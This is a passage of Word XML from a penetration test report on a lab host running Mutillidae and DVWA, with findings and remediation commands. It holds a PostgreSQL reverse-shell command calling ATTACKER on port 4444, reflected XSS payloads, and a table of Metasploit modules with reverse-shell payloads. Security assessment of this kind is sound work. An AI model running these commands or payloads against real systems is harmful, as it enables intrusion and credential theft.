          <w:color w:val="1B4F72"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Kill-Chain Escalation Path</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A5276"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Connect: psql -h 192.168.64.2 -U postgres (no password)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Read all databases — extract user credentials</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Execute: COPY (SELECT '') TO PROGRAM 'bash -i &gt;&amp; /dev/tcp/ATTACKER/4444 0&gt;&amp;1'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Receive postgres OS user shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Escalate to root via kernel exploits or sudo misconfiguration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B4F72"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Change the postgres password, bind PostgreSQL to localhost, and restrict pg_hba.conf access to authenticated local connections only.</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333333" w:sz="4"/>
              <w:left w:val="single" w:color="333333" w:sz="4"/>
              <w:bottom w:val="single" w:color="333333" w:sz="4"/>
              <w:right w:val="single" w:color="333333" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="1E1E1E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF88"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">su - postgres -c "psql -c \"ALTER USER postgres PASSWORD 'STRONG_PASS';\""</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF88"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">sed -i "s/listen_addresses = '\*'/listen_addresses = 'localhost'/" /etc/postgresql/*/main/postgresql.conf</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF88"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">systemctl restart postgresql</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF88"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">ufw deny 5432/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>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4. Web Application Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Web scanning was performed using Nikto, Dirb, SQLMap, and a custom XSS payload engine (WSA 2026 cheat sheet). The following vulnerabilities were confirmed on the HTTP services at port 80 and 8180.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B4F72"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1  XSS (Reflected)</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Host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8"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.64.2:80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15 confirmed reflected XSS payloads were injected and reflected in Mutillidae pages (/mutillidae/index.php) via page, target_host, username parameters. Payloads include &lt;script&gt;alert(1)&lt;/script&gt;, &lt;img src=x onerror=alert(1)&gt;, &lt;svg onload=alert(1)&gt;.</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Attackers can steal session cookies, redirect users to malicious sites, perform phishing, and execute arbitrary JavaScript in the victim's browser context.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>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Remediation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Implement context-aware output encoding on all user-supplied input. Use a Content Security Policy (CSP) header. Validate and sanitise all URL parameters server-side.</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4.2  SQLi (via sqlmap)</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Host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8"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.64.2:80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sqlmap confirmed SQL injection on Mutillidae vulnerable application endpoints. The database user has DBA privileges.</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Full database dump including user credentials, PII, and application data. Potential OS command execution via SQL (INTO OUTFILE, UDF injection).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>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Remediation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Use parameterised queries / prepared statements. Remove vulnerable applications (Mutillidae, DVWA) from production. Restrict MySQL to localhost.</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4.3  Directory Indexing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Host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8"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.64.2:80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Multiple directories are open for browsing: /doc/, /test/, /dav/ — exposing system documentation paths and application source.</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Information disclosure enables targeted attacks by revealing server structure, installed software versions, and potentially configuration files.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>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Remediation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Disable directory listing in Apache: set 'Options -Indexes' in httpd.conf or .htaccess.</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4.4  phpinfo() Exposed</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Host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8"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.64.2:80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/phpinfo.php is accessible and reveals full PHP configuration, loaded modules, server paths, and environment variables.</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Provides attackers with detailed intelligence to tailor further attacks including path traversal, session attacks, and targeted PHP exploits.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>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Remediation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Remove /phpinfo.php from production. Disable phpinfo() calls in application code.</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4.5  Missing Security Headers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Host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8"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.64.2:80, :8009, :8180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Multiple services are missing critical HTTP security headers: X-Content-Type-Options, X-XSS-Protection, Strict-Transport-Security, Content-Security-Policy, Referrer-Policy.</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Browser-based attacks including clickjacking, MIME sniffing, and XSS are facilitated by the absence of these headers.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>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Remediation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Add all recommended security headers to the web server configuration. Use securityheaders.com to validate.</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4.6  Clickjacking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72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Host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8"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.64.2:80</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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Description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Missing X-Frame-Options header allows the application to be embedded in iframes on attacker-controlled pages.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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Business Impact</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UI redress (clickjacking) attacks can trick users into performing unintended actions such as changing passwords or authorising transactions.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="2E7D32" w:sz="4"/>
              <w:left w:val="single" w:color="2E7D32" w:sz="4"/>
              <w:bottom w:val="single" w:color="2E7D32" w:sz="4"/>
              <w:right w:val="single" w:color="2E7D32" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="2E7D3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Remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="72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8"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Add 'Header always append X-Frame-Options DENY' to Apache configuration. Alternatively use CSP frame-ancestors directive.</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4.7  XSS Proof-of-Concept URLs (15 Confirmed)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The following URLs confirmed reflected XSS execution in Mutillidae (http://192.168.64.2:80):</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200"/>
        <w:gridCol w:w="7826"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>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Page</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7826"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C0392B" w:sz="4"/>
              <w:left w:val="single" w:color="C0392B" w:sz="4"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="4"/>
              <w:right w:val="single" w:color="C0392B" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="C0392B"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Payload / URL</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add-to-your-blog</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&lt;script&gt;alert(1)&lt;/script&gt;</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add-to-your-blog</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&lt;img src=x onerror=alert(1)&gt;</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add-to-your-blog</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&lt;svg onload=alert(1)&gt;</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add-to-your-blog</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 onmouseover="alert(1)" x="</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dns-lookup</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&lt;script&gt;alert(1)&lt;/script&gt; (via target_host param)</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dns-lookup</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&lt;img src=x onerror=alert(1)&gt;</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user-info.php</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&lt;script&gt;alert(1)&lt;/script&gt; (via username param)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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5"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">user-info.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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C0392B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;svg onload=alert(1)&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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5. Confirmed Exploit Modules</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The following Metasploit Framework modules were identified as applicable to services on the target. These represent confirmed, weaponised exploitation vectors requiring no custom development.</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400"/>
        <w:gridCol w:w="4000"/>
        <w:gridCol w:w="2000"/>
        <w:gridCol w:w="1626"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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Target</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="40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Module</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1626"/>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Expected Result</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192.168.64.2:21</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exploit/unix/ftp/vsftpd_234_backdoor</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Root shell via port 6200</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192.168.64.2:3632</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exploit/unix/misc/distcc_exec</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cmd/unix/reverse_bash</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Shell as distcc daemon user</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192.168.64.2:5432</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exploit/linux/postgres/postgres_payload</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linux/x86/meterpreter/reverse_tcp</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Meterpreter as postgres user</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192.168.64.2:6667</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exploit/unix/irc/unreal_ircd_3281_backdoor</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Shell as IRC daemon user</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192.168.64.2:6697</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exploit/unix/irc/unreal_ircd_3281_backdoor</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Shell as IRC daemon user</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192.168.64.2:8180</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exploit/multi/http/tomcat_mgr_upload</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java/meterpreter/reverse_tcp</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Meterpreter as Tomcat user</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192.168.64.2:8787</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exploit/linux/misc/drb_remote_codeexec</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cmd/unix/reverse_bash</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Shell as Ruby DRb user</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192.168.64.2:512</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auxiliary/scanner/rservices/rexec_login</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Authentication check / shell</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192.168.64.2:513</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auxiliary/scanner/rservices/rlogin_login</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Authentication check / shell</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192.168.64.2:3306</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auxiliary/scanner/mysql/mysql_login</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Auth with empty root password</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192.168.64.2:5900</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auxiliary/scanner/vnc/vnc_login</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Auth with 'password'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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C0392B"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.64.2:1524</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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5"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">exploit/multi/bind_shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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000000"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve">linux/x86/shell_reverse_tcp</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6"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Direct root shell (pre-open)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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6. Remediation Plan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The following table provides a prioritised remediation plan for all services. CRITICAL items must be addressed before the system is connected to any network. Items are listed in priority order.</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500"/>
        <w:gridCol w:w="700"/>
        <w:gridCol w:w="900"/>
        <w:gridCol w:w="2200"/>
        <w:gridCol w:w="3726"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9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Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Required Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3726"/>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Linux Remediation Command</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vsftpd 2.3.4</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21</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Uninstall immediately — backdoored binary</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apt-get remove --purge vsftpd -y &amp;&amp; apt-get install vsftpd -y</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="10" w:before="10"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF88"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">ufw deny 21/tcp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Telnet</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23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9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Disable telnet — use SSH instead</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systemctl stop telnetd &amp;&amp; systemctl disable telnetd</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="10" w:before="10"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF88"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">apt-get remove telnetd -y</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="10" w:before="10"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF88"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">ufw deny 23/tcp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ISC BIND 9.4.2</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53</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Upgrade BIND to current stable release</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apt-get install --only-upgrade bind9 -y</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="10" w:before="10"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF88"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">systemctl restart bind9</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="10" w:before="10"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF88"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">ufw deny 53 from 0.0.0.0/0</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Apache httpd 2.2.8</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80</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9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Upgrade Apache and PHP; remove dev apps</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apt-get upgrade apache2 php -y</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="10" w:before="10"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF88"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">rm -rf /var/www/html/mutillidae /var/www/html/dvwa</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="10" w:before="10"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF88"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">a2enmod headers &amp;&amp; a2dismod status</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="10" w:before="10"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF88"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">systemctl restart apache2</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rexec / rlogin / rsh</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512-514</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Disable r-services — use SSH</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systemctl stop rexec rlogin rsh</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="10" w:before="10"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF88"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">apt-get remove rsh-server -y</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="10" w:before="10"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF88"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">ufw deny 512/tcp</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="10" w:before="10"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF88"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">ufw deny 513/tcp</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="10" w:before="10"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF88"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">ufw deny 514/tcp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Java RMI</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1099</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9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Disable RMI registry if not needed</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 Kill RMI registry process</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="10" w:before="10"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF88"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">kill $(lsof -t -i:1099)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="10" w:before="10"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF88"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">ufw deny 1099/tcp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MySQL 5.0.51a</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3306</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Set root password; bind to localhost</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mysqladmin -u root password 'STRONG_PASS'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="10" w:before="10"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF88"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">mysql_secure_installation</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="10" w:before="10"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF88"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">sed -i 's/bind-address.*/bind-address = 127.0.0.1/' /etc/mysql/mysql.conf.d/mysqld.cnf</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="10" w:before="10"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF88"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">systemctl restart mysql</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="10" w:before="10"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF88"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">ufw deny 3306/tcp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DistCC daemon</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3632</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Remove DistCC — unauthenticated RCE</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systemctl stop distcc &amp;&amp; systemctl disable distcc</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="10" w:before="10"/>
            </w:pPr>
            <w:r>
              <w:rPr>
